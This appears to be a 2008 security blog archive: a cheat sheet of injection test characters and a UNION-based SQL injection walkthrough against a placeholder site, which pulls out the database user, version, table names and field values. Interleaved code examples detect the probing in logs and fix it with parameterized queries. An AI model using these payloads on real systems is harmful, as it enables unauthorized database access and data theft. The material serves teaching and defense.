Thursday, May 29, 2008

SQL Injection Walkthrough part V (input validation)

Input Validation Cheat Sheet

Related articles: SQL Injection Cheat Sheet

We sometimes carelessly throw characters up and about in an attempt to find a gem. This paper covers miscellaneous injection characters and their meanings when applied to web application testing.

Character(s)              Details
NULL or null              Often produces interesting error messages as the web application is expecting a value. It can also help us determine if the backend is a PL/SQL gateway.
{' , " , ;}               Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
{-- , = , + , "}          These characters are used to craft SQL Injection queries.
{` , & , ! , | , < , >}   Used to find command execution vulnerabilities.
">                        Used for basic Cross-Site Scripting checks.
{%0d , %0a}               Carriage Return / Line Feed (new line); all round bad.
{%7f , %ff}               Byte-length overflows; maximum 7- and 8-bit values.
{-1 , other}              Integer overflow and underflow vulnerabilities.
Ax1024+                   Overflow vulnerabilities.
{%n , %x , %s}            Testing for format string vulnerabilities.
../                       Directory traversal vulnerabilities.
{% , _ , *}               Wildcard characters can sometimes present DoS issues or information disclosure.



These characters can be represented in many different ways (e.g. percent-encoded or as Unicode equivalents). It is important to understand this when restricting input to these character sets.
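The point about alternative representations is easy to get wrong in a filter. The following added example (not code from the original post) contrasts a naive denylist check on the raw value with a check that first canonicalizes the input (bounded percent-decoding, then Unicode NFKC normalization) and then applies an allowlist. The sample values are constructed for the example; the only real behaviour relied on is that U+FF07 FULLWIDTH APOSTROPHE normalizes to an ASCII apostrophe under NFKC.

```python
import re
import unicodedata
from urllib.parse import unquote

# Constructed sample inputs: the same apostrophe written four different ways.
SAMPLES = {
    "plain": "O'Brien",
    "percent": "O%27Brien",            # single URL-encoding
    "double_percent": "O%2527Brien",   # double URL-encoding
    "fullwidth": "O\uff07Brien",       # U+FF07 FULLWIDTH APOSTROPHE
}


def naive_contains_quote(value: str) -> bool:
    """Denylist check on the raw value: it sees only the literal ASCII quote."""
    return "'" in value


def canonicalize(value: str, max_decode_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded so that a
    pathological input cannot loop), then apply NFKC so compatibility
    variants collapse onto their ASCII forms. Validation runs on this."""
    decoded = value
    for _ in range(max_decode_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return unicodedata.normalize("NFKC", decoded)


def contains_quote_after_canonicalization(value: str) -> bool:
    """The same denylist check, but applied to the canonical form."""
    return "'" in canonicalize(value)


# Allowlist for a field that only ever needs a short identifier (hypothetical policy).
IDENTIFIER_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def is_allowed_identifier(value: str) -> bool:
    """Positive validation: accept only what the field legitimately needs,
    judged on the canonical form rather than on the raw bytes."""
    return IDENTIFIER_RE.fullmatch(canonicalize(value)) is not None


def compare_checks():
    """Return {sample_name: (naive_result, canonicalized_result)}."""
    return {
        name: (naive_contains_quote(v), contains_quote_after_canonicalization(v))
        for name, v in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, (naive, canon) in compare_checks().items():
        print(f"{name:15s} naive={naive!s:5s} canonicalized={canon}")
```

The naive check flags only the plain sample; after canonicalization all four are recognised as carrying a quote. Even so, the allowlist (`is_allowed_identifier`) is the check worth keeping: it does not need to enumerate every dangerous character or encoding.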


Monday, May 5, 2008

SQL Injection Walkthrough part IV

UNION SQL INJECTION - DETECTION

Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--

NO ERROR
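The column-count probing above leaves a very recognisable trace in web server logs: one client, the same resource, a UNION SELECT whose select list grows by one item per request, server errors until the count is right and then a 200. The following added example (not from the original post) parses constructed Common Log Format lines, decodes the query string, extracts the number of items in any UNION SELECT list and raises a separate alert when a client completes that probe sequence. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines: the probe sequence from the walkthrough, then a normal request.
LOG_LINES = [
    '10.0.0.5 - - [05/May/2008:10:00:01 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201-- HTTP/1.1" 500 512',
    '10.0.0.5 - - [05/May/2008:10:00:02 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2-- HTTP/1.1" 500 512',
    '10.0.0.5 - - [05/May/2008:10:00:03 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3-- HTTP/1.1" 500 512',
    '10.0.0.5 - - [05/May/2008:10:00:04 +0000] "GET /page.asp?id=1%20UNION%20SELECT%20ALL%201,2,3,4-- HTTP/1.1" 200 2048',
    '10.0.0.9 - - [05/May/2008:10:00:05 +0000] "GET /page.asp?id=7 HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \d+'
)
# Matches UNION SELECT / UNION ALL SELECT and captures the select list up to a "--" comment.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(?P<cols>[^-]*)", re.IGNORECASE)


def parse_line(line):
    """Parse one CLF line into a dict with a decoded query string, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(urlsplit(rec["target"]).query)
    rec["status"] = int(rec["status"])
    return rec


def union_column_count(query):
    """Number of items in a UNION SELECT list found in the query, else None."""
    m = UNION_RE.search(query)
    if not m:
        return None
    cols = re.sub(r"^(?:all|distinct)\s+", "", m.group("cols").strip(), flags=re.IGNORECASE)
    return len([c for c in cols.split(",") if c.strip()])


def analyse(lines):
    """Return alerts as (kind, client_ip, column_count, status) tuples."""
    per_client = defaultdict(list)
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        n = union_column_count(rec["query"])
        if n is None:
            continue
        alerts.append(("union_select", rec["ip"], n, rec["status"]))
        per_client[rec["ip"]].append((n, rec["status"]))

    for ip, seq in per_client.items():
        counts = [n for n, _ in seq]
        # Select list grew by exactly one item per request, at least three times.
        increasing = len(counts) >= 3 and all(b == a + 1 for a, b in zip(counts, counts[1:]))
        # Server errors while the count was wrong, then a successful response.
        completed = seq[-1][1] == 200 and all(s >= 500 for _, s in seq[:-1])
        if increasing and completed:
            alerts.append(("column_count_probe_succeeded", ip, counts[-1], 200))
    return alerts


if __name__ == "__main__":
    for alert in analyse(LOG_LINES):
        print(alert)
```

The per-request `union_select` alert is noisy on its own (legitimate applications rarely, but occasionally, pass SQL keywords in parameters); the `column_count_probe_succeeded` correlation is the one worth paging on, because it indicates the attacker has found a working column count and the next requests will be data extraction.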


UNION SQL INJECTION - EXTRACT DATABASE USER

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--

[DB USER]


UNION SQL INJECTION - EXTRACT DATABASE NAME

http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4--

[DB NAME]


UNION SQL INJECTION - EXTRACT DATABASE VERSION

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--

[DB VERSION]


UNION SQL INJECTION - EXTRACT SERVER NAME

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--

[SERVER NAME]


UNION SQL INJECTION - EXTRACT DATABASE TABLES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--

[TABLE NAME 1]


UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--

[COLUMN NAME 1]


UNION SQL INJECTION - EXTRACT 1st FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--

[FIELD 1 VALUE]


UNION SQL INJECTION - EXTRACT 2nd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--

[FIELD 2 VALUE]


UNION SQL INJECTION - EXTRACT 3rd FIELD

http://[site]/page.asp?id=1 UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--

[FIELD 3 VALUE]
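Every step of this walkthrough depends on the `id` parameter being pasted into the SQL text. The following added example (not code from the original post) reproduces that pattern against a constructed four-column SQLite table, runs the walkthrough's own column-count probe through it, and then shows the two fixes that close it: binding the value as a parameter, and validating the type before binding. The table, its rows and the `page` name are constructed for the example; the probe string is the one used above.

```python
import sqlite3

PROBE = "1 UNION SELECT ALL 1,2,3,4--"   # the page's four-column probe


def build_db():
    """Constructed in-memory database with a four-column table, matching the
    four-column result shape the walkthrough settles on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE page (id INTEGER, title TEXT, body TEXT, author TEXT)")
    conn.executemany(
        "INSERT INTO page VALUES (?,?,?,?)",
        [(1, "Welcome", "hello", "alice"), (2, "About", "info", "bob")],
    )
    return conn


def lookup_vulnerable(conn, raw_id: str):
    """The pattern behind page.asp?id=: the parameter becomes part of the SQL text,
    so a UNION in the input becomes a UNION in the query."""
    return conn.execute(f"SELECT * FROM page WHERE id={raw_id}").fetchall()


def lookup_parameterized(conn, raw_id: str):
    """Same query with a bound parameter: whatever the input contains, the
    database only ever sees it as a value to compare against id."""
    return conn.execute("SELECT * FROM page WHERE id=?", (raw_id,)).fetchall()


def lookup_validated(conn, raw_id: str):
    """Positive validation first (an id is an integer), then bind it.
    int() raises ValueError on anything like '1 UNION SELECT ...'."""
    id_value = int(raw_id)
    return conn.execute("SELECT * FROM page WHERE id=?", (id_value,)).fetchall()


def rejects_probe() -> bool:
    """True if the validated lookup refuses the probe string outright."""
    try:
        lookup_validated(build_db(), PROBE)
    except ValueError:
        return True
    return False


def demo():
    conn = build_db()
    return {
        "vulnerable": lookup_vulnerable(conn, PROBE),        # two rows: the real one plus (1,2,3,4)
        "parameterized": lookup_parameterized(conn, PROBE),  # no rows: nothing has that id
        "legit": lookup_validated(conn, "1"),                # the one real row
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:14s} {rows}")
    print("validated lookup rejects probe:", rejects_probe())
```

With the concatenated query the attacker-controlled row `(1, 2, 3, 4)` comes back alongside the real one, which is exactly the "NO ERROR" outcome the walkthrough looks for. With a bound parameter the same string simply matches no row, and with type validation it never reaches the database at all. Parameterization is the fix; validation is the cheap second layer that also keeps the probe out of application logs.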
